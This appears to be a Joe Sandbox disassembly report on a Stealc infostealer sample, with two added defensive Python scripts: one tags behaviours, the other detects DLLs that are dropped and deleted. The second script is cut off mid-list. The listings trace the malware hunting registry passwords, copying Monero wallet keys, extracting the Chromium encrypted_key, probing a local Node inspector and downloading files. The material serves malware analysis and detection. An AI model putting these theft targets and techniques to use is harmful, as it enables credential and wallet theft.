                                  • Instruction Fuzzy Hash: 445142B1D55118EBCB24FB64EDA6EED737D9F54300F4045D8B20A620D2EE385BC8CAA5
                                  APIs
                                  • InternetOpenA.WININET(00720AF6,00000001,00000000,00000000,00000000), ref: 00709A6A
                                  • InternetOpenUrlA.WININET(00000000,http://localhost:9229/json,00000000,00000000,80000000,00000000), ref: 00709AAB
                                  • InternetCloseHandle.WININET(00000000), ref: 00709AC7
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2137632278.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                                   • Associated: 00000000.00000002.2137619503.0000000000700000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137632278.000000000072C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137632278.000000000083D000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137632278.0000000000849000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137632278.000000000086E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137632278.00000000009D6000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137814810.00000000009EA000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137814810.0000000000B74000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137814810.0000000000C54000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137814810.0000000000C7A000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137814810.0000000000C81000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137814810.0000000000C90000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2138043905.0000000000C91000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2138147631.0000000000E34000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2138161384.0000000000E35000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_700000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Internet$Open$CloseHandle
                                  • String ID: "webSocketDebuggerUrl":$"ws://$http://localhost:9229/json
                                  • API String ID: 3289985339-2144369209
                                  • Opcode ID: 27c3ac89cb1cd34dd1d81396c398721085628a365b3c0b2d59347d5a36f8165d
                                  • Instruction ID: 378ed34531e641294e1546a5097cec0a5054877f1b332761aa8898562d6d9e57
                                  • Opcode Fuzzy Hash: 27c3ac89cb1cd34dd1d81396c398721085628a365b3c0b2d59347d5a36f8165d
                                  • Instruction Fuzzy Hash: E6413AB5A54218EBCB14EF94DC99BDDB7B4BB48340F104199F145A61D1DBB8AEC0CBA0
                                  APIs
                                    • Part of subcall function 00707330: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 0070739A
                                    • Part of subcall function 00707330: RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 00707411
                                    • Part of subcall function 00707330: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0070746D
                                    • Part of subcall function 00707330: GetProcessHeap.KERNEL32(00000000,?), ref: 007074B2
                                    • Part of subcall function 00707330: HeapFree.KERNEL32(00000000), ref: 007074B9
                                  • lstrcat.KERNEL32(00000000,0072192C), ref: 00707666
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 007076A8
                                  • lstrcat.KERNEL32(00000000, : ), ref: 007076BA
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 007076EF
                                  • lstrcat.KERNEL32(00000000,00721934), ref: 00707700
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00707733
                                  • lstrcat.KERNEL32(00000000,00721938), ref: 0070774D
                                  • task.LIBCPMTD ref: 0070775B
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2137632278.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                                   • Associated: 00000000.00000002.2137619503.0000000000700000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137632278.000000000072C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137632278.000000000083D000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137632278.0000000000849000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137632278.000000000086E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137632278.00000000009D6000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137814810.00000000009EA000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137814810.0000000000B74000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137814810.0000000000C54000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137814810.0000000000C7A000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137814810.0000000000C81000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137814810.0000000000C90000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2138043905.0000000000C91000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2138147631.0000000000E34000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2138161384.0000000000E35000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_700000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$Heap$EnumFreeOpenProcessValuetask
                                  • String ID: :
                                  • API String ID: 2677904052-3653984579
                                  • Opcode ID: 0a74b8ce1ccbd203feb93501a00741dd7204ec0b5a459975a86510008f3acca8
                                  • Instruction ID: dd1ca61db95a450bce35444121bd90ad3abfaae6dce3037d8e2f28a584656801
                                  • Opcode Fuzzy Hash: 0a74b8ce1ccbd203feb93501a00741dd7204ec0b5a459975a86510008f3acca8
                                  • Instruction Fuzzy Hash: D231A675D59108EBDB08DBE0DC99DFFB3B9AF48301B504209F112A72E0EA38A9C5DB51
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,011DE2D8,00000000,?,00720E14,00000000,?,00000000), ref: 007182C0
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 007182C7
                                  • GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 007182E8
                                  • __aulldiv.LIBCMT ref: 00718302
                                  • __aulldiv.LIBCMT ref: 00718310
                                  • wsprintfA.USER32 ref: 0071833C
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2137632278.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                                   • Associated: 00000000.00000002.2137619503.0000000000700000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137632278.000000000072C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137632278.000000000083D000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137632278.0000000000849000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137632278.000000000086E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137632278.00000000009D6000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137814810.00000000009EA000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137814810.0000000000B74000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137814810.0000000000C54000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137814810.0000000000C7A000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137814810.0000000000C81000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137814810.0000000000C90000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2138043905.0000000000C91000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2138147631.0000000000E34000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2138161384.0000000000E35000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_700000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap__aulldiv$AllocateGlobalMemoryProcessStatuswsprintf
                                  • String ID: %d MB$@
                                  • API String ID: 2774356765-3474575989
                                  • Opcode ID: 5b71ff332dd01bf4867c63fb4af469b3b49594039dbda87514beacc3d6874f29
                                  • Instruction ID: b24eca6b9b70931af190a925b460f284bbe75b369dd4276c0ba4bfc75c7461a0
                                  • Opcode Fuzzy Hash: 5b71ff332dd01bf4867c63fb4af469b3b49594039dbda87514beacc3d6874f29
                                  • Instruction Fuzzy Hash: DC2108B1E58218ABDB10DFD8DC49FAEB7B9FB44B10F104509F615BB2C0D77859408BA5
                                  APIs
                                    • Part of subcall function 0071AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0071AAF6
                                    • Part of subcall function 00704800: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00704889
                                    • Part of subcall function 00704800: InternetCrackUrlA.WININET(00000000,00000000), ref: 00704899
                                  • InternetOpenA.WININET(00720DFB,00000001,00000000,00000000,00000000), ref: 0070615F
                                  • StrCmpCA.SHLWAPI(?,011DE920), ref: 00706197
                                  • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 007061DF
                                  • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 00706203
                                  • InternetReadFile.WININET(?,?,00000400,?), ref: 0070622C
                                  • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0070625A
                                  • CloseHandle.KERNEL32(?,?,00000400), ref: 00706299
                                  • InternetCloseHandle.WININET(?), ref: 007062A3
                                  • InternetCloseHandle.WININET(00000000), ref: 007062B0
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2137632278.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                                   • Associated: 00000000.00000002.2137619503.0000000000700000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137632278.000000000072C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137632278.000000000083D000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137632278.0000000000849000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137632278.000000000086E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137632278.00000000009D6000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137814810.00000000009EA000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137814810.0000000000B74000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137814810.0000000000C54000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137814810.0000000000C7A000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137814810.0000000000C81000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137814810.0000000000C90000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2138043905.0000000000C91000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2138147631.0000000000E34000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2138161384.0000000000E35000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_700000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Internet$CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                                  • String ID:
                                  • API String ID: 2507841554-0
                                  • Opcode ID: fa15cf4c899f21b0d07b539f37841c0a78dfc473ad0e6015077c00c5a7cb885e
                                  • Instruction ID: bda441b0f3a9276cc35ef22d31cf709f73957f261c26ec5b8678f9cb7ea79c7a
                                  • Opcode Fuzzy Hash: fa15cf4c899f21b0d07b539f37841c0a78dfc473ad0e6015077c00c5a7cb885e
                                  • Instruction Fuzzy Hash: 035181B1A45218EBDB20DF90DC59BEEB7B9BB44301F008299F605A71C0DB786AC5CF95
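The function blocks above describe, one API call at a time, five of this Stealc sample's routines: locating "encrypted_key":" with StrStrA and base64-decoding what follows with CryptStringToBinaryA (flag 00000001 is CRYPT_STRING_BASE64), the field Chromium-based browsers use for their DPAPI-wrapped master key; reading wallet_path under SOFTWARE\monero-project\monero-core, appending .keys, copying the wallet key file with CopyFileA, reading the copy and deleting it with DeleteFileA; fetching http://localhost:9229/json and searching the answer for "webSocketDebuggerUrl":"ws://, i.e. probing for an exposed Node.js inspector; enumerating values under HKEY_CURRENT_USER (80000001) with RegEnumValueA and testing each for the substring Password; and writing the body of a URL to disk through InternetOpenUrlA, InternetReadFile and WriteFile. The script below is an added example, not Joe Sandbox tooling and not code from the sample: it parses the report's own "• Api.MODULE(args), ref: ADDR" and "• String ID:" lines, counts the "Part of subcall function" lines toward the caller in which the report inlines them, and tags every block whose API set and strings satisfy a rule built from the blocks above. The rule labels and the trimmed excerpt used as input are this example's own constructions.

```python
"""Tag the function blocks of a Joe Sandbox disassembly listing with stealer behaviours.
Added example for this report, not Joe Sandbox tooling: it parses the "APIs" and
"String ID" lines as printed above and applies rules built from those blocks.
"""
import re
from dataclasses import dataclass, field

# "• Api.MODULE(args), ref: ADDR" or "• Api.MODULE ref: ADDR", optionally prefixed
# with "Part of subcall function ADDR:" (calls of a callee that the report inlines).
API_RE = re.compile(
    r"^•\s*(?:Part of subcall function (?P<sub>[0-9A-F]{8}):\s*)?"
    r"(?P<api>[^\s.(]+)\.(?P<mod>[A-Z0-9]+)"
    r"(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]{8})\s*$"
)
STR_RE = re.compile(r"^•\s*String ID:\s*(?P<ids>.*)$")  # '$'-separated string list

# (label, APIs that must all occur in the block, substrings that must all occur in
# its call arguments or String ID list). Labels are this example's own names.
RULES = [
    ("chromium_local_state_key", {"StrStrA", "CryptStringToBinaryA"}, {'"encrypted_key":"'}),
    ("monero_wallet_theft", {"RegOpenKeyExA", "RegQueryValueExA", "CopyFileA", "DeleteFileA"},
     {"monero", ".keys"}),
    ("node_inspector_probe", {"InternetOpenUrlA"}, {"localhost:9229/json", "webSocketDebuggerUrl"}),
    ("registry_password_hunt", {"RegEnumValueA", "StrStrA"}, {"Password"}),
    ("download_to_disk", {"InternetOpenUrlA", "InternetReadFile", "CreateFileA", "WriteFile"}, set()),
]

@dataclass
class Block:
    apis: set = field(default_factory=set)    # APIs of the function and its inlined subcalls
    refs: list = field(default_factory=list)  # call sites that belong to the function itself
    text: list = field(default_factory=list)  # argument strings and String ID entries

def parse_blocks(report: str) -> list:
    """Split the listing at every 'APIs' header and collect one Block per function."""
    blocks = []
    for raw in report.splitlines():
        line = raw.strip()
        if line == "APIs":
            blocks.append(Block())
            continue
        if not blocks:
            continue  # text before the first block (headers, dump sources) is ignored
        m = API_RE.match(line)
        if m:
            blocks[-1].apis.add(m["api"])
            if m["sub"] is None:
                blocks[-1].refs.append(m["ref"])
            if m["args"]:
                blocks[-1].text.append(m["args"])
            continue
        s = STR_RE.match(line)
        if s:
            blocks[-1].text.extend(s["ids"].split("$"))
    return blocks

def tag_block(block: Block) -> list:
    """Labels of every rule whose APIs and strings are all present (case-insensitive)."""
    haystack = " ".join(block.text).lower()
    return [label for label, apis, needles in RULES
            if apis <= block.apis and all(n.lower() in haystack for n in needles)]

def tag_report(report: str) -> dict:
    """Map each function, keyed by its first own call site, to its behaviour labels."""
    return {(b.refs[0] if b.refs else f"block{i}"): tag_block(b)
            for i, b in enumerate(parse_blocks(report))}

# Constructed excerpt: five blocks copied from the listing above, trimmed to the
# lines the rules need. Backslashes are literal, hence the raw string.
SAMPLE_REPORT = r"""
APIs
• Part of subcall function 0070A430: StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 0070A489
• Part of subcall function 0070A210: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,>Op,00000000,00000000), ref: 0070A23F
• GlobalFree.KERNEL32(?), ref: 00714762
APIs
• Part of subcall function 007012A0: RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 007012D7
• Part of subcall function 007012A0: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 007012F5
• lstrcat.KERNEL32(?,.keys), ref: 00701377
• CopyFileA.KERNEL32(?,00000000,00000001), ref: 00701465
• DeleteFileA.KERNEL32(00000000), ref: 007014EF
• String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
APIs
• InternetOpenA.WININET(00720AF6,00000001,00000000,00000000,00000000), ref: 00709A6A
• InternetOpenUrlA.WININET(00000000,http://localhost:9229/json,00000000,00000000,80000000,00000000), ref: 00709AAB
• String ID: "webSocketDebuggerUrl":$"ws://$http://localhost:9229/json
APIs
• Part of subcall function 00707330: RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 00707411
• Part of subcall function 00707330: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0070746D
• lstrcat.KERNEL32(00000000,0072192C), ref: 00707666
APIs
• InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 007061DF
• CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 00706203
• InternetReadFile.WININET(?,?,00000400,?), ref: 0070622C
• WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0070625A
"""

if __name__ == "__main__":
    for func, labels in tag_report(SAMPLE_REPORT).items():
        print(func, labels or ["-"])
```

Subcall lines are credited to the caller because that is how Joe Sandbox prints them: the tag therefore lands on the outermost function that exhibits the behaviour, which is the address worth opening in the snapshot. Rules test for a subset of APIs rather than an exact sequence, so the many lstrcat and CloseHandle calls that surround the interesting ones do not matter, and needle matching is case-insensitive because the listing itself mixes monero and Monero.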
                                  APIs
                                  • type_info::operator==.LIBVCRUNTIME ref: 0078024D
                                  • ___TypeMatch.LIBVCRUNTIME ref: 0078035B
                                  • CatchIt.LIBVCRUNTIME ref: 007803AC
                                  • CallUnexpected.LIBVCRUNTIME ref: 007804C8
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2137632278.000000000072C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                                   • Associated: 00000000.00000002.2137619503.0000000000700000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137632278.0000000000701000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137632278.000000000083D000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137632278.0000000000849000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137632278.000000000086E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137632278.00000000009D6000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137814810.00000000009EA000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137814810.0000000000B74000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137814810.0000000000C54000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137814810.0000000000C7A000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137814810.0000000000C81000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137814810.0000000000C90000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2138043905.0000000000C91000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2138147631.0000000000E34000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2138161384.0000000000E35000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_700000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CallCatchMatchTypeUnexpectedtype_info::operator==
                                  • String ID: csm$csm$csm
                                  • API String ID: 2356445960-393685449
                                  • Opcode ID: 0aa7d8e53ae69f4e65a14af659269dcd6c8d533d9c3592b436de8e99f8465a7b
                                  • Instruction ID: a9fa67a1b00be433781930eb3d5d491710c041afc98407b198fa6a440a6150ea
                                  • Opcode Fuzzy Hash: 0aa7d8e53ae69f4e65a14af659269dcd6c8d533d9c3592b436de8e99f8465a7b
                                  • Instruction Fuzzy Hash: 10B1C171880209DFCF69EFA4C8499AEB7B5FF05310F10815AE9196B212D378DA55CFD1
                                  APIs
                                  • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 0070739A
                                  • RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 00707411
                                  • StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0070746D
                                  • GetProcessHeap.KERNEL32(00000000,?), ref: 007074B2
                                  • HeapFree.KERNEL32(00000000), ref: 007074B9
                                  • task.LIBCPMTD ref: 007075B5
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2137632278.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                                  • Associated: same memory dump set as listed for the first function record above
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_700000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$EnumFreeOpenProcessValuetask
                                  • String ID: Password
                                  • API String ID: 775622407-3434357891
                                  • Opcode ID: e3875c5a242bcca61b9a9a7b30e8addcb1b337c781a8e5b3c5f68da39aa6b525
                                  • Instruction ID: 954ca36adcc5b47dcd2dfe58915748e1eb20aa6e981a9a0598762d9e701e55d4
                                  • Opcode Fuzzy Hash: e3875c5a242bcca61b9a9a7b30e8addcb1b337c781a8e5b3c5f68da39aa6b525
                                  • Instruction Fuzzy Hash: 80611CB5D1416CDBDB24DB50CC45BD9B7B8BF48304F0082E9E689A6181EBB46BC9CF91
                                  APIs
                                    • Part of subcall function 0071AA50: lstrcpy.KERNEL32(00720E1A,00000000), ref: 0071AA98
                                    • Part of subcall function 0071ACC0: lstrlen.KERNEL32(?,011D8F90,?,\Monero\wallet.keys,00720E1A), ref: 0071ACD5
                                    • Part of subcall function 0071ACC0: lstrcpy.KERNEL32(00000000), ref: 0071AD14
                                    • Part of subcall function 0071ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 0071AD22
                                    • Part of subcall function 0071AC30: lstrcpy.KERNEL32(00000000,?), ref: 0071AC82
                                    • Part of subcall function 0071AC30: lstrcat.KERNEL32(00000000), ref: 0071AC92
                                    • Part of subcall function 0071ABB0: lstrcpy.KERNEL32(?,00720E1A), ref: 0071AC15
                                    • Part of subcall function 0071AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0071AAF6
                                  • lstrlen.KERNEL32(00000000), ref: 0070BC6F
                                    • Part of subcall function 00718FC0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00718FE2
                                  • StrStrA.SHLWAPI(00000000,AccountId), ref: 0070BC9D
                                  • lstrlen.KERNEL32(00000000), ref: 0070BD75
                                  • lstrlen.KERNEL32(00000000), ref: 0070BD89
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2137632278.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                                  • Associated: same memory dump set as listed for the first function record above
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_700000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrlen$lstrcat$AllocLocal
                                  • String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
                                  • API String ID: 3073930149-1079375795
                                  • Opcode ID: 225f74e6b8f439f9b044e99c42e846dda3c9897b9b0d1a5e37d0e5762522ee13
                                  • Instruction ID: 7fe68a0e79132f557c3ef7fd8baad4c9b61b20bc2b47a08fe6a6f752b79a574e
                                  • Opcode Fuzzy Hash: 225f74e6b8f439f9b044e99c42e846dda3c9897b9b0d1a5e37d0e5762522ee13
                                  • Instruction Fuzzy Hash: 09B141B1A15108EBCB14FBA4DCAAEEE7379AF14310F404559F506621D1EF386B88CB72
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2137632278.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                                  • Associated: same memory dump set as listed for the first function record above
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_700000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ExitProcess$DefaultLangUser
                                  • String ID: *
                                  • API String ID: 1494266314-163128923
                                  • Opcode ID: 461f7c76c8ab48eb96aacde8f68eb284b3a12e24968e25f7e1abd041dc61a34c
                                  • Instruction ID: d32ab38d41939336b0855f01cdb1a771b1cd22d51307f055724566e5bd0e9e0e
                                  • Opcode Fuzzy Hash: 461f7c76c8ab48eb96aacde8f68eb284b3a12e24968e25f7e1abd041dc61a34c
                                  • Instruction Fuzzy Hash: 0AF03A329DE219EFD3449FE4A80979CFB30AB04706F118296E619961D0E6756A80EB51
                                  APIs
                                    • Part of subcall function 0071AA50: lstrcpy.KERNEL32(00720E1A,00000000), ref: 0071AA98
                                    • Part of subcall function 00719850: CreateFileA.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,?,007108DC,C:\ProgramData\chrome.dll), ref: 00719871
                                    • Part of subcall function 0070A090: LoadLibraryA.KERNEL32(C:\ProgramData\chrome.dll), ref: 0070A098
                                  • StrCmpCA.SHLWAPI(00000000,011D90B0), ref: 00710922
                                  • StrCmpCA.SHLWAPI(00000000,011D8FE0), ref: 00710B79
                                  • StrCmpCA.SHLWAPI(00000000,011D8F80), ref: 00710A0C
                                    • Part of subcall function 0071AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0071AAF6
                                  • DeleteFileA.KERNEL32(C:\ProgramData\chrome.dll), ref: 00710C35
                                  Strings
                                  • C:\ProgramData\chrome.dll, xrefs: 007108CD
                                  • C:\ProgramData\chrome.dll, xrefs: 00710C30
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2137632278.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                                  • Associated: same memory dump set as listed for the first function record above
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_700000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Filelstrcpy$CreateDeleteLibraryLoad
                                  • String ID: C:\ProgramData\chrome.dll$C:\ProgramData\chrome.dll
                                  • API String ID: 585553867-663540502
                                  • Opcode ID: 7cd7dfcd335899e174891d84b15df1290be95bcb79a2a6838ed7696d95c8df83
                                  • Instruction ID: dd6f5ac2b9dc3ef77db8e1e580c99a9cceee4f1e857f4534f95627a343072f3a
                                  • Opcode Fuzzy Hash: 7cd7dfcd335899e174891d84b15df1290be95bcb79a2a6838ed7696d95c8df83
                                  • Instruction Fuzzy Hash: 21A15671700248EFCB28EF68D996EED77B6AF94300F50816DE40A5F391DA349B45CB92
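The record above shows the sample writing C:\ProgramData\chrome.dll (CreateFileA with GENERIC_WRITE, 0x40000000, and CREATE_ALWAYS, 2), loading it with LoadLibraryA and removing it again with DeleteFileA once the StrCmpCA checks are done. On a monitored host the same sequence appears as Sysmon FileCreate (11), ImageLoad (7) and FileDelete (23 or 26) events from one process. The detection below is an added example written for this page, not code from Joe Sandbox or from the sample: the events are constructed to mirror the record, the field names follow Sysmon, and the watched directories and the 60-second window are assumptions.

```python
"""Flag a DLL that one process writes under a world-writable directory, loads
and then deletes within a short window, from Sysmon-style events.
Added example for this page; not code from the report, Joe Sandbox or the
sample. EVENTS is constructed to mirror the chrome.dll record above."""
from collections import defaultdict
from datetime import datetime, timedelta

# Assumptions: directories any user can write to, and how long a dropped DLL
# may live before its deletion is treated as clean-up rather than normal use.
WATCHED_PREFIXES = ("c:\\programdata\\", "c:\\users\\public\\")
WINDOW = timedelta(seconds=60)
# Sysmon event IDs -> stage (23 = FileDelete archived, 26 = FileDeleteDetected).
STAGE = {11: "create", 7: "load", 23: "delete", 26: "delete"}

# Constructed events; field names follow Sysmon's EVTX data.
EVENTS = [
    {"EventID": 11, "UtcTime": "2024-01-01 12:00:01.100", "ProcessId": 4120,
     "Image": r"C:\Users\user\Desktop\file.exe", "TargetFilename": r"C:\ProgramData\chrome.dll"},
    {"EventID": 7, "UtcTime": "2024-01-01 12:00:01.300", "ProcessId": 4120,
     "Image": r"C:\Users\user\Desktop\file.exe", "ImageLoaded": r"C:\ProgramData\chrome.dll",
     "Signed": "false"},
    {"EventID": 26, "UtcTime": "2024-01-01 12:00:09.800", "ProcessId": 4120,
     "Image": r"C:\Users\user\Desktop\file.exe", "TargetFilename": r"C:\ProgramData\chrome.dll"},
    # Benign installer: writes and loads a helper DLL in ProgramData but leaves it on disk.
    {"EventID": 11, "UtcTime": "2024-01-01 12:05:00.000", "ProcessId": 5000,
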